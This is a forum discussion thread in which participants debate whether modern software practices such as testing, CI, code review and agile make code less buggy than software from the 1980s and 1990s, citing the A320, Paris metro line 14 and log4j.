In 1988, Airbus delivered the first A320 with electronic flight commands, which was safe.
In 1998, the RATP inaugurated line 14 of the metro in Paris, which was fully automated, after formally proving that its software would never ever be able to bug.
Gitlab didn't exist back then, and yet these companies made a code that was safe.
I guess the main driver of code quality is whether the company cares, and has the proper specifications, engineering before coding, and quality management procedures, before the tech tooling.
It certainly is simpler now to make quality code.
But don't forget that software used to be safe, and it was a choice of companies like Microsoft, with Windows, or more recently Boeing with the 737 Max, to let the users beta test code and patch it afterwards (Aka early, reckless agile)
So yeah, modern codes look less buggy. But it's mainly because companies care IMO.
> It certainly is simpler now to make quality code.
Just think of the log4j fiasco last year. Or the famous left-pad thing. Perhaps you don't import any dependencies, but just imagine the complexity of (for example) the JVM. Point is, you can surely write "quality code", but even with quality code it's much harder to control the quality of the end product.
Requirements have gotten more complex too. 30 years ago people were generally happy with computers automating mundane parts of a process. These days we expect software to out-perform humans unsupervised (self-driving?). With exploding requirements software is bound to become more and more buggy with the increased complexity.
Quality assurance and software engineering can be applied everywhere, no matter the processes you use to create and deliver the code.
Methods and tools would be different, depending on context, but ANY serious company ought to do quality management
At the very least, know your code, think a few moves ahead, make sure you deliver a safe code, and apply some amount of ISO9001 at the company level (and hopefully much more at any other level)
Also, a security analysis is mandatory for both industrial code and for IT applications, thanks to standards, laws like the GDPR its principle of privacy by design, and contractual requirements from serious partners. You risk a lot if your code leaks customer data or crashes a plane.
it's the same for having 'specifications'.
Call them functional and safety requirements, tickets, personas, user stories, or any name, but you have to do them to be able to work with the devs, and describe to your customer and users what you have actually developed.
the 'lots of things [that] cannot be' scare me as a junior engineer.
I feel like they are made by these shady companies that offer 2 interns and a junior, to get you a turnkey solution within 12 hours. It also gives me back bad memories of homework made at the last minute in uni, and I would never do that again.
And as far as I saw in both cases, the resulting software is painful to use or to evolve afterwards.
> describe to your customer and users what you have actually developed.
In the domain I work in, what customers want (and what we provide) changes monthly at worst, annually at best. And in many cases, customers do not know what they want until they have already used some existing version, and is subject to continual revision as their understanding of their own goals evolves.
This is true for more or less all software used in "creative" fields.
I don't understand how this practice makes your modern code more reliable, sorry
I was replying to
>Are modern codebases with modern practices less buggy than the ones from 20 years ago?
I understood that @NayamAmarshe acknowledged about new practices and tools introduced after my examples, in the 80s, 90s, and early 2000s (mostly with agile everywhere, and v-methods becoming a red flag on a resume and in business meetings).
It seemed to be the essence of their question.
So all I was saying was that codes from back then where capable of being safe. Reliability wasn't invented by modern practices.
Modern practices have only changed the development process, as you mentioned. Not the safety.
And if it did, it affected safety, as doing provably safe code with new practices is still being researched at the academic level.
(check out the case of functional safety vs/with agile methods)
Can you explain how do you make your code less buggy, than a code from 20 years ago, with practices from back then ?
My point was that you cannot use the software development processes used in planes and transportation systems in every area of software development. Those processes are extremely reliant on a fully-determined specification, and these do not exist for all (maybe even most?) areas.
If you're inevitably locked into a cycle of evolving customer expectations and desires, it is extremely hard and possibly impossible to, for example, build a full coverage testing harness.
IMO yes. Software is a lot more reliable than it was 25 years ago. This boils down to:
1. Unit/regression testing, CI
2. Code reviews and code review tools that are good.
3. Much more use of garbage collected languages.
4. Crash reporting/analytics combined with online updates.
Desktop software back in the early/mid nineties was incredibly unreliable. When I was at school and they were teaching Win3.1 and MS Office we were told to save our work every few minutes and that "it crashed" would not be accepted as an excuse to not hand work in on time, because things crashed so often you were just expected to anticipate that and (manually) save files like mad.
Programming anything was a constant exercise in hitting segfaults (access violations to Windows devs), and crashes in binary blobs where you didn't have access to any of the code. It was expected that if you used an API wrong you'd just corrupt memory or get garbage pixels. Nothing did any logging, there were no exceptions, at best you might get a vague error code. A large chunk of debugging work back then would involve guessing what might be going wrong, or just randomly trying things until you were no longer hitting the bugs. There was no StackOverflow of course but even if there had been, you got so little useful information when something went wrong that you couldn't even ask useful questions most of the time. And bugs were considered more or less an immutable fact of life. There was often no good way to report bugs to the OS or tool vendors, and even if you did, the bad code would be out there for years so you'd need to work around it anyway.
These days it's really rare for software to just crash. I don't even remember the last time a mobile app crashed on me for example. Web apps don't crash really, although arguably that's because if anything goes wrong they just keep blindly ploughing forward regardless and if the result is nonsensical, no matter. Software is just drastically more robust and if crashes do get shipped the devs find out and they get fixed fast.
It improves velocity not code quality. You can achieve the same quality levels but making changes takes much more time.
Delivery costs of software is way down in many domains (SaaS teams frequently deliver dozens or hundreds of releases a day). That would not be possible without automated tests.
Are modern codebases with modern practices less buggy than the ones from 20 years ago?